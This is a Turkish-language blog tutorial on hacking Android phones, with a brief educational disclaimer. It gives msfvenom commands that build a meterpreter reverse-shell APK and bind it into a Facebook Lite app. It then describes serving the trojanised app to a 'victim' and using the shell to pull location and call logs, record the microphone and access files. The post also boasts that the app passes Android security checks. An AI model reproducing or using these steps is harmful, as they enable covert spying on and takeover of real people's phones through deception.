Ferdi Birgül

Cep Telefonu Hackleme

Ferdi birgül's photo
Ferdi birgül
·

4 min read

Cep Telefonu Hackleme

Yasal Uyarı!

“Cep Telefonu Hacking” konulu bu makale yalnızca eğitim amaçlıdır. Herhangi bir yasadışı faaliyeti onaylamıyorum veya teşvik etmiyorum. Tüm gösteriler kontrollü bir ortamda simüle edilmiştir. Mobil cihazlara yetkisiz erişim sağlamaya çalışmayın. Bu bilgileri sorumlu bir şekilde ve risk size ait olmak üzere kullanın.

Dijital çağda cep telefonları kişisel asistan, iletişim cihazı ve internete açılan kapı olarak hizmet vererek günlük hayatımızın ayrılmaz bir parçası haline geldi. Ancak sundukları kolaylık, güvenlik ihlali riskini de beraberinde getiriyor.

Cep Telefonu Hacking Nedir? Bu, mobil cihazlara ve verilere yetkisiz erişim, manipülasyon veya istismar anlamına gelir. Kötü amaçlı yazılım, kimlik avı, ağ saldırıları ve sosyal mühendislik dahil ancak bunlarla sınırlı olmamak üzere bilgisayar korsanları tarafından kullanılan yöntemler de dahil olmak üzere cep telefonu korsanlığının çeşitli yönleri.

  • Kötü Amaçlı Yazılım : Mobil cihazlar da dahil olmak üzere bilgisayar sistemlerine sızmak, zarar vermek veya bunlara yetkisiz erişim sağlamak için tasarlanmış kötü amaçlı yazılım. Örnekler arasında virüsler, solucanlar, Truva atları ve casus yazılımlar yer alır.

  • Kimlik avı : Elektronik iletişimde güvenilir bir varlık gibi davranarak bireyleri kullanıcı adları, parolalar veya finansal veriler gibi hassas bilgileri ifşa etmeleri için kandırmayı içeren bir siber saldırı yöntemi.

  • Ortadaki Adam (MitM) Saldırısı : Saldırganın iki taraf arasındaki iletişimi onların bilgisi olmadan kestiği ve muhtemelen değiştirdiği bir tür siber saldırıdır. Bu, Wi-Fi bağlantıları da dahil olmak üzere ağ ortamlarında yürütülebilir.

  • Sosyal Mühendislik : Bireylerin gizli bilgileri ifşa edecek şekilde manipüle edilmesi veya güvenliği tehlikeye atacak eylemler gerçekleştirmesi, genellikle teknik araçlar yerine psikolojik manipülasyon yoluyla.

Bu pratik gösteri için, Android Cihazlara odaklanan Kötü Amaçlı Yazılım ve Kimlik Avı tekniklerinin güçlü kombinasyonunu kullandık . Daha sonra msfvenom'u kullanarak kötü amaçlı bir uygulama oluşturacağız ve kurbanı stratejik olarak onu indirip yüklemeye ikna edeceğiz. Bu aldatıcı manevra bize telefonları üzerinde tam erişim ve kontrol sağladı ve bu tür siber tehditlerin kurbanı olmanın ciddi sonuçlarını gösterdi.

LABORATUVAR KURULUMU

Öncelikle kali linux üzerinde Mobile Hacking Lab'ımızı kurmamız gerekiyor.

Android cihazların ve uygulamaların değerlendirmesini yapabilmek için gerçek veya taklit edilmiş bir Android cihazına ihtiyacımız var.

Bu pratik için gerçek bir cihaz kullandık, ancak burada sanal bir Android ortamıyla etkileşim kurmak için eksiksiz bir sensör ve özellikler setine sahip bir Android emülatörü olan Genymotion'u kuracak bir lonca var.

Bu uygulamayı doğru bir şekilde indirmek ve kali linux'umuza kurmak için Genymotion indirme sayfasının resmi web sitesini burada ziyaret ettik.

Kurulum için dosyayı indirdiğimiz dizine gidip aşağıdaki komutları çalıştırıyoruz.

Bu dizini sisteminizde çalıştırıp not alın.

Ayrıca virtualbox ve adb'yi de kuruyoruz

Genymotion'u çalıştırmak için yukarıda vurgulanan dizine gidiyoruz.

Ve çalıştırın, uygulama açılmalıdır.

Buraya tıklayarak bir hesap oluşturduk.

Bu sayfaya yönlendirildik.

Daha sonra giriş yapıyoruz bu seçenekleri seçin

Nihayet çalışır durumda

Şimdi bir cihaz ekleyelim

Tamamı boyunca ileri'ye tıklayın

Düzenlemek

Sanal Telefonumuz çalışır durumda.

Şimdi tek yapmamız gereken msfvenom kullanarak zararlı uygulamamızı oluşturup kurbana göndermek.

Yükümüzü oluşturuyoruz

msfvenom , yaygın olarak kullanılan bir sızma testi ve yararlanma araç seti olan Metasploit Çerçevesi içindeki güçlü bir araçtır. msfvenom, güvenlik profesyonellerinin ve etik korsanların çeşitli istismarlar için özel veriler oluşturmasına olanak tanır. Bu veriler, uzaktan kod yürütme, kabuk erişimi ve daha fazlasını içeren çeşitli platformlar ve amaçlar için oluşturulabilir.

Araç, kullanıcıların veri yükü türlerini, kodlama tekniklerini, çıktı formatlarını ve diğer parametreleri belirlemesine olanak tanıyarak veri yüklerinin oluşturulmasında esneklik sağlar.

Msfvenom kullanarak kötü amaçlı bir APK oluşturmak için aşağıdaki komutu kullandık

sudo msfvenom - platform android -a java -p android/meterpreter/reverse_tcp LHOST=<Attacker_IP> LPORT=<Port> -f raw -o zararlı.apk

Saldırganın IP'sini alıyoruz

Veri yükümüzü Facebook Lite ile bağlama

Facebook Lite APK'sını buradan apkpure'den indirdim .

APK'yı payload'a bağlamak için aşağıdaki komutu kullanıyoruz

sudo msfvenom --platform android -a java -p android/meterpreter/reverse_tcp -x Facebook_Lite_401.0.0.14.110_Apkpure.apk LHOST=Atacker_IP LPORT=Bağlantı noktası -o kötü niyetliFB.apk

Uygulamayı Sunma ve İndirme

Uygulamayı kurbanımıza göndermek için çeşitli yöntemler kullanabiliriz, burada uygulamaya hizmet etmek için basit bir python http sunucusu kullandık.

Kötü amaçlı uygulamanın kurbanın tarayıcısı aracılığıyla indirilmesi.

Kötü Amaçlı uygulamamız 4 Nisan 2024 itibarıyla tüm Android güvenlik kontrollerinden geçmiştir.

Mağdurun telefonuna erişim sağlanması

Bunun için ters kabuk işleyicimizi ve gerekli parametreleri ayarlamak için msfconsole'u kullanacağız.

………………………kesinti…………………….

Şimdi Android telefonumuzda MainActivity apk’sına tıklayarak uygulamayı başlatıyoruz.

Ve bum!!! Kurbanımızın telefonunda ölçüm cihazı kabuğu var!

Çalıştırdığımız işletim sistemi gibi uzak sistem hakkında bilgi almak için;

Kullanıcıya sunucunun biz koşarken çalıştığını göstermek için; getuid

Hedefte çalıştırabileceğimiz tüm olası komutları görüntülemek için yardım komutunu kullanıyoruz .

…………………………..kesinti………………………….

Cihazın rootlu mu yoksa jailbreakli mi olduğunu kontrol etmek için check_root komutunu çalıştırıyoruz.

Ayrıca cihazın mevcut konumunu görüntülemek için geolocate komutunu da kullandık.

Kurbanın tüm arama kayıtlarını almak için dump_calllog komutunu kullandık

Ayrıca, webcam_list komutunu çalıştırarak cihazın kaç web kamerasına sahip olduğunu da görebiliriz .

Kullanıcıyı gizlice dinlemek için de Record_mic komutunu kullandık.

Dosya Sistemi Erişimi

Aşağıda gösterildiği gibi dosya yükleyebileceğimiz, dosya indirebileceğimiz ve dosyaların içeriğini okuyabileceğimiz tam bir dosya sistemimiz var;

Ve Bingoooo!!!

Teşekkürler ❤️

Did you find this article valuable?

Support Ferdi Birgül by becoming a sponsor. Any amount is appreciated!

hackingferdibirgülDeveloperDeveloper Tools